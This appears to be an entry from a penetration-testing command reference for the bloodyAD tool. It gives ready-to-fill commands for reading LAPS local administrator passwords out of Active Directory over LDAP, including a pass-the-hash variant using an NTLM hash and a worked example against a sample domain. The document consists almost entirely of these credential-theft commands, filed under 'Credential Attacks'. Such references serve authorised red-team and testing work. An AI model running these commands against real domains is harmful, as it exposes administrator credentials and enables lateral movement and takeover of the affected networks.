BloodyAD LAPS Password Read

Read LAPS passwords from Active Directory using BloodyAD

Tool
bloodyAD
Category
Credential Attacks / gMSA & LAPS
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

bloodyAD --host '<ip>' -d '<domain>' -u '<user>' -p '<password>' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

bloodyAD --host '<ip>' -d '<domain>' -u '<user>' --hashes ':<hash>' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Examples

bloodyAD --host '192.168.1.2' -d 'corp.local' -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Tags

bloodyad laps ms-mcs-admpwd local-admin password